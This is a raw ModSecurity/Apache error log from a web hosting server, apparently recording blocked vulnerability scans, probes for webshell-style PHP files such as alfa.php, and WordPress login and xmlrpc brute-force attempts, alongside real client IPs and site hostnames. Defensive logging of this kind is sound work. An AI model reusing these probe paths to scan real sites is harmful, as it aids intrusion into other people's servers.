[Tue May 26 15:47:06.981186 2026] [security2:error] [pid 745492:tid 745732] [client 103.153.130.62:62645] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzIomEQglTmoWcfxJzpQAAAPA"]
[Tue May 26 15:47:07.290121 2026] [security2:error] [pid 747840:tid 748091] [client 4.193.189.92:7993] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/222.php"] [unique_id "ahVzI4m6MwAuYuZKxvnlLQAAAYM"]
[Tue May 26 15:47:07.937968 2026] [security2:error] [pid 745492:tid 745678] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzI4mEQglTmoWcfxJzrwAAALo"]
[Tue May 26 15:47:08.085993 2026] [security2:error] [pid 747840:tid 748086] [client 4.193.189.92:8592] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/adminfuns.php"] [unique_id "ahVzJIm6MwAuYuZKxvnlNwAAAX4"]
[Tue May 26 15:47:08.894101 2026] [security2:error] [pid 747840:tid 748005] [client 4.193.189.92:12374] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/abcd.php"] [unique_id "ahVzJIm6MwAuYuZKxvnlQgAAAS0"]
[Tue May 26 15:47:09.512868 2026] [security2:error] [pid 745492:tid 745716] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzJYmEQglTmoWcfxJz0gAAAOA"]
[Tue May 26 15:47:09.698361 2026] [security2:error] [pid 747840:tid 748046] [client 4.193.189.92:3300] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/al.php"] [unique_id "ahVzJYm6MwAuYuZKxvnlVQAAAVY"]
[Tue May 26 15:47:10.343836 2026] [security2:error] [pid 745492:tid 745696] [client 69.48.202.178:53651] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 178.202.48.69.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/wp-login.php"] [unique_id "ahVzJomEQglTmoWcfxJz3QAAAMw"], referer: https://www.cagmedya.com/dijital-donusumde-web-sitesi-tasariminin-rolu/
[Tue May 26 15:47:10.503038 2026] [security2:error] [pid 747840:tid 748003] [client 4.193.189.92:11247] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/alfa.php"] [unique_id "ahVzJom6MwAuYuZKxvnlXwAAASs"]
[Tue May 26 15:47:10.666474 2026] [security2:error] [pid 745492:tid 745610] [remote 193.42.61.12:36392] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/wp-login.php"] [unique_id "ahVzJomEQglTmoWcfxJz5AAA1XI"]
[Tue May 26 15:47:11.160639 2026] [security2:error] [pid 747840:tid 747911] [remote 113.190.40.93:55688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 93.40.190.113.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVzJ4m6MwAuYuZKxvnlbwABIEY"]
[Tue May 26 15:47:11.309887 2026] [security2:error] [pid 747840:tid 748020] [client 4.193.189.92:8180] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/as.php"] [unique_id "ahVzJ4m6MwAuYuZKxvnleAAAATw"]
[Tue May 26 15:47:12.124143 2026] [security2:error] [pid 745492:tid 745751] [client 4.193.189.92:6091] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/aa.php"] [unique_id "ahVzKImEQglTmoWcfxJz9AAAAQM"]
[Tue May 26 15:47:12.209024 2026] [security2:error] [pid 745492:tid 745651] [client 57.141.2.19:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzJ4mEQglTmoWcfxJz8AAAAJ8"]
[Tue May 26 15:47:12.914409 2026] [security2:error] [pid 745492:tid 745718] [client 4.193.189.92:7519] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/abc.php"] [unique_id "ahVzKImEQglTmoWcfxJz_QAAAOI"]
[Tue May 26 15:47:12.978827 2026] [security2:error] [pid 747840:tid 747971] [client 223.123.35.44:36216] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 44.35.123.223.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzKIm6MwAuYuZKxvnloQAAAQs"]
[Tue May 26 15:47:12.979010 2026] [security2:error] [pid 747840:tid 747971] [client 223.123.35.44:36216] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahVzKIm6MwAuYuZKxvnloQAAAQs"]
[Tue May 26 15:47:13.694348 2026] [security2:error] [pid 747840:tid 748087] [client 4.193.189.92:1730] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/av.php"] [unique_id "ahVzKYm6MwAuYuZKxvnltAAAAX8"]
[Tue May 26 15:47:14.207694 2026] [security2:error] [pid 747840:tid 748010] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzKYm6MwAuYuZKxvnluAAAATI"]
[Tue May 26 15:47:14.237319 2026] [security2:error] [pid 747840:tid 748047] [client 69.48.202.178:54584] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVzKom6MwAuYuZKxvnlwQAAAVc"], referer: https://www.cagmedya.com/dijital-donusumde-web-sitesi-tasariminin-rolu/
[Tue May 26 15:47:14.528591 2026] [security2:error] [pid 747840:tid 748044] [client 4.193.189.92:2997] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/autoload_classmap.php"] [unique_id "ahVzKom6MwAuYuZKxvnlygAAAVQ"]
[Tue May 26 15:47:15.131311 2026] [security2:error] [pid 747840:tid 748049] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahVzK4m6MwAuYuZKxvnl2gAAAVk"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1232283&moderation-hash=43b8394d8ca4bca40bc29b5b711a71c9
[Tue May 26 15:47:15.292915 2026] [security2:error] [pid 745492:tid 745746] [client 4.193.189.92:8637] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/asus.php"] [unique_id "ahVzK4mEQglTmoWcfxJ0FAAAAP4"]
[Tue May 26 15:47:15.738857 2026] [security2:error] [pid 747840:tid 747983] [client 57.141.2.11:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzK4m6MwAuYuZKxvnl4AAAARc"]
[Tue May 26 15:47:16.043841 2026] [security2:error] [pid 745492:tid 745634] [client 4.193.189.92:6117] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/about.php"] [unique_id "ahVzLImEQglTmoWcfxJ0HwAAAI4"]
[Tue May 26 15:47:16.045968 2026] [security2:error] [pid 745492:tid 745688] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVzK4mEQglTmoWcfxJ0HQAAAMQ"], referer: https://anujtradingco.com/top-deejay-headphones/?unapproved=1232283&moderation-hash=43b8394d8ca4bca40bc29b5b711a71c9
[Tue May 26 15:47:16.846399 2026] [security2:error] [pid 747840:tid 748055] [client 4.193.189.92:6281] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/atomlib.php"] [unique_id "ahVzLIm6MwAuYuZKxvnl_QAAAV8"]
[Tue May 26 15:47:17.222149 2026] [security2:error] [pid 747840:tid 748066] [client 103.153.130.62:62933] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzLYm6MwAuYuZKxvnmBwAAAWo"]
[Tue May 26 15:47:17.222283 2026] [security2:error] [pid 747840:tid 748066] [client 103.153.130.62:62933] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzLYm6MwAuYuZKxvnmBwAAAWo"]
[Tue May 26 15:47:17.390945 2026] [security2:error] [pid 747840:tid 747920] [remote 95.216.117.13:55440] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 13.117.216.95.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahVzLYm6MwAuYuZKxvnmBAABLk8"]
[Tue May 26 15:47:17.614046 2026] [security2:error] [pid 747840:tid 748000] [client 4.193.189.92:11311] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/alfa-rex.php7"] [unique_id "ahVzLYm6MwAuYuZKxvnmCwAAASg"]
[Tue May 26 15:47:17.855734 2026] [security2:error] [pid 745492:tid 745684] [client 57.141.2.44:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzLYmEQglTmoWcfxJ0KQAAAMA"]
[Tue May 26 15:47:18.413630 2026] [security2:error] [pid 745492:tid 745704] [client 4.193.189.92:9994] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/b.php"] [unique_id "ahVzLomEQglTmoWcfxJ0NwAAANQ"]
[Tue May 26 15:47:19.178970 2026] [security2:error] [pid 745492:tid 745658] [client 4.193.189.92:10127] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/buy.php"] [unique_id "ahVzL4mEQglTmoWcfxJ0RgAAAKY"]
[Tue May 26 15:47:19.904447 2026] [security2:error] [pid 747840:tid 748034] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzL4m6MwAuYuZKxvnmGgAAAUo"]
[Tue May 26 15:47:20.410762 2026] [security2:error] [pid 747840:tid 748020] [client 4.193.189.92:11610] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/bless.php"] [unique_id "ahVzMIm6MwAuYuZKxvnmKAAAATw"]
[Tue May 26 15:47:20.554776 2026] [security2:error] [pid 747840:tid 748030] [client 143.110.243.118:48376] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 118.243.110.143.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.grcorp.moes-art.com"] [uri "/i3wfj.php"] [unique_id "ahVzMIm6MwAuYuZKxvnmKwAAAUY"]
[Tue May 26 15:47:21.158414 2026] [security2:error] [pid 747840:tid 748067] [client 4.193.189.92:5590] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/class-t.api.php"] [unique_id "ahVzMYm6MwAuYuZKxvnmNAAAAWs"]
[Tue May 26 15:47:21.894340 2026] [security2:error] [pid 745492:tid 745705] [client 4.193.189.92:4309] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/cache.php"] [unique_id "ahVzMYmEQglTmoWcfxJ0agAAANU"]
[Tue May 26 15:47:22.532519 2026] [security2:error] [pid 747840:tid 748065] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzMom6MwAuYuZKxvnmTAAAAWk"]
[Tue May 26 15:47:22.643906 2026] [security2:error] [pid 747840:tid 748034] [client 4.193.189.92:5581] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/content.php"] [unique_id "ahVzMom6MwAuYuZKxvnmWwAAAUo"]
[Tue May 26 15:47:23.254580 2026] [security2:error] [pid 747840:tid 747970] [client 74.7.244.48:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.moremi.taotechservices.com"] [uri "/cgi-sys/404.html"] [unique_id "ahVzM4m6MwAuYuZKxvnmbgAAAQo"]
[Tue May 26 15:47:23.271310 2026] [security2:error] [pid 747840:tid 747990] [client 74.7.244.48:37880] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "www.moremi.taotechservices.com"] [uri "/robots.txt"] [unique_id "ahVzM4m6MwAuYuZKxvnmbAABHgc"]
[Tue May 26 15:47:23.366976 2026] [security2:error] [pid 747840:tid 748050] [client 4.193.189.92:10146] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/classwithtostring.php"] [unique_id "ahVzM4m6MwAuYuZKxvnmcQAAAVo"]
[Tue May 26 15:47:23.685947 2026] [autoindex:error] [pid 747840:tid 748010] [client 74.7.243.238:0] AH01276: Cannot serve directory /home1/taote1zo/moremi.taotechservices.com/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:47:23.962361 2026] [security2:error] [pid 745492:tid 745717] [client 31.57.184.107:52654] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 107.184.57.31.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "autodiscover.acacia.org.in"] [uri "/wp-login.php"] [unique_id "ahVzM4mEQglTmoWcfxJ0eQAAAOE"], referer: https://www.google.com/
[Tue May 26 15:47:24.163822 2026] [security2:error] [pid 747840:tid 748062] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzM4m6MwAuYuZKxvnmfQAAAWY"]
[Tue May 26 15:47:24.174410 2026] [security2:error] [pid 747840:tid 748001] [client 4.193.189.92:1746] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/css.php"] [unique_id "ahVzNIm6MwAuYuZKxvnmgwAAASk"]
[Tue May 26 15:47:24.654911 2026] [security2:error] [pid 747840:tid 747989] [client 176.118.188.18:51669] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVzNIm6MwAuYuZKxvnmggAAAR0"], referer: https://www.cagmedya.com/web-tasarim-ajansi/
[Tue May 26 15:47:24.929485 2026] [security2:error] [pid 745492:tid 745666] [client 23.158.233.122:62340] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 122.233.158.23.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVzNImEQglTmoWcfxJ0iwAAAK4"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 15:47:24.929641 2026] [security2:error] [pid 745492:tid 745666] [client 23.158.233.122:62340] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVzNImEQglTmoWcfxJ0iwAAAK4"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 15:47:24.958669 2026] [security2:error] [pid 747840:tid 747994] [client 4.193.189.92:6113] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/chosen.php"] [unique_id "ahVzNIm6MwAuYuZKxvnmlAAAASI"]
[Tue May 26 15:47:25.297481 2026] [security2:error] [pid 747840:tid 748016] [client 23.158.233.122:62367] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "200"] [hostname "www.cagmedya.com"] [uri "/xmlrpc.php"] [unique_id "ahVzNYm6MwAuYuZKxvnmmgAAATg"], referer: https://www.cagmedya.com/mersin-web-tasarim/
[Tue May 26 15:47:25.702615 2026] [security2:error] [pid 747840:tid 748029] [client 4.193.189.92:6284] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/doc.php"] [unique_id "ahVzNYm6MwAuYuZKxvnmoQAAAUU"]
[Tue May 26 15:47:26.480506 2026] [security2:error] [pid 747840:tid 748005] [client 4.193.189.92:6280] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/elp.php"] [unique_id "ahVzNom6MwAuYuZKxvnmswAAAS0"]
[Tue May 26 15:47:26.717854 2026] [security2:error] [pid 747840:tid 748050] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzNom6MwAuYuZKxvnmrwAAAVo"]
[Tue May 26 15:47:27.251152 2026] [security2:error] [pid 745492:tid 745698] [client 4.193.189.92:1789] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/Exception-class.php"] [unique_id "ahVzN4mEQglTmoWcfxJ0pgAAAM4"]
[Tue May 26 15:47:27.728045 2026] [security2:error] [pid 745492:tid 745631] [client 103.153.130.62:63226] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.130.153.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzN4mEQglTmoWcfxJ0rwAAAIs"]
[Tue May 26 15:47:27.728163 2026] [security2:error] [pid 745492:tid 745631] [client 103.153.130.62:63226] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "anujtradingco.com"] [uri "/xmlrpc.php"] [unique_id "ahVzN4mEQglTmoWcfxJ0rwAAAIs"]
[Tue May 26 15:47:27.988572 2026] [security2:error] [pid 745492:tid 745640] [client 4.193.189.92:10910] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/ee.php"] [unique_id "ahVzN4mEQglTmoWcfxJ0swAAAJQ"]
[Tue May 26 15:47:28.754574 2026] [security2:error] [pid 745492:tid 745717] [client 4.193.189.92:11318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 92.189.193.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "vishaal-shah.com"] [uri "/edit.php"] [unique_id "ahVzOImEQglTmoWcfxJ0vwAAAOE"]
[Tue May 26 15:47:28.893998 2026] [security2:error] [pid 745492:tid 745699] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVzOImEQglTmoWcfxJ0vAAAAM8"]
